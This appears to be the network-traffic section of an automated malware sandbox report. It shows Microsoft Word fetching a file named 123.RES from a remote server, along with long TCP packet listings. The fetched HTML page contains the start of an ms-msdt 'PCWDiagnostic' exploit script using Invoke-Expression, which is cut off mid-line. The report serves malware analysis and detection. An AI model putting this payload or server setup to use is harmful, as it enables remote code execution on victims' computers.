                                                                                                                                                                                            Jun 7, 2022 19:51:26.956818104 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956854105 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956857920 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956899881 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956921101 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956939936 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956980944 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957000017 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957019091 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957058907 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957089901 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957099915 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957143068 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957160950 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960211992 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960256100 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960294962 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960310936 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960336924 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960345984 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960376978 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960413933 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960432053 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960453987 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960511923 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960519075 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960560083 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960601091 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960618019 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960640907 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960680008 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960699081 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960998058 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961040020 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961071014 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961078882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961121082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961133957 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961162090 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961199999 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961215019 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961240053 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961280107 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961292982 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961319923 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961359024 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961373091 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961397886 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961437941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961448908 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961996078 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962038040 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962073088 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962079048 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962119102 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962141037 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962160110 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962199926 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962219954 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962241888 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962279081 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962294102 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962318897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962357998 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962373972 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962395906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962435961 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962449074 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962996006 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963038921 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963072062 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963078976 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963119030 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963135958 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963157892 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963197947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963212967 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963234901 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963274956 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963290930 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963315964 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963355064 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963376045 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963395119 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963434935 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963449001 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963473082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963512897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963532925 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963557005 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963598967 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963615894 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963640928 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963680029 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963696003 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963720083 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963759899 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963777065 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963799000 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963838100 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963855028 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963875055 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963948011 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:56.275350094 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:56.303694963 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:52:31.964868069 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:52:31.965503931 CEST4986580192.168.2.5185.234.247.119

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • 185.234.247.119

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.549744185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Jun 7, 2022 19:50:11.720185995 CEST472OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.748681068 CEST473INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:11.868760109 CEST483OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.900027037 CEST483INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:14.981090069 CEST937OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.009474993 CEST937INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:14 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:15.701190948 CEST1301OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.729496002 CEST1302INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:15.765372038 CEST1302OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.793732882 CEST1302INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            1192.168.2.549763185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Jun 7, 2022 19:50:15.090852022 CEST938OUTGET /123.RES HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119044065 CEST939INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
                                                                                                                                                                                            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119088888 CEST940INData Raw: 73 71 75 65 20 71 75 69 73 20 70 72 65 74 69 75 6d 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 66 61 63 69 6c 69 73 69 73 20 75 6c 74 72 69 63 69 65 73 20 6d 61 73 73 61 20 61 63 20 63 6f 6d 6d 6f 64 6f 2e 20 4e 61 6d 20 6e 65 63 20 63 6f 6e
                                                                                                                                                                                            Data Ascii: sque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas sceleri
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119126081 CEST942INData Raw: 65 72 64 75 6d 2c 20 6e 69 73 6c 20 65 75 20 6c 61 6f 72 65 65 74 20 74 65 6d 70 75 73 2c 20 61 75 67 75 65 20 6e 69 73 6c 20 76 6f 6c 75 74 70 61 74 20 6f 64 69 6f 2c 20 64 69 63 74 75 6d 20 61 6c 69 71 75 61 6d 20 6d 61 73 73 61 20 6f 72 63 69
                                                                                                                                                                                            Data Ascii: erdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condime
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119165897 CEST943INData Raw: 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73 61 20 71 75 69 73 20 61 72 63 75 20 65 67
                                                                                                                                                                                            Data Ascii: amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi convallis fringilla
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119206905 CEST945INData Raw: 2c 20 6a 75 73 74 6f 20 61 63 20 70 6f 72 74 61 20 66 61 63 69 6c 69 73 69 73 2c 20 6d 69 20 73 61 70 69 65 6e 20 65 66 66 69 63 69 74 75 72 20 69 70 73 75 6d 2c 20 73 69 74 20 66 75 73 63 65 2e 0d 0a 3c 2f 70 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d
                                                                                                                                                                                            Data Ascii: , justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invo
                                                                                                                                                                                            Jun 7, 2022 19:50:15.351569891 CEST945OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
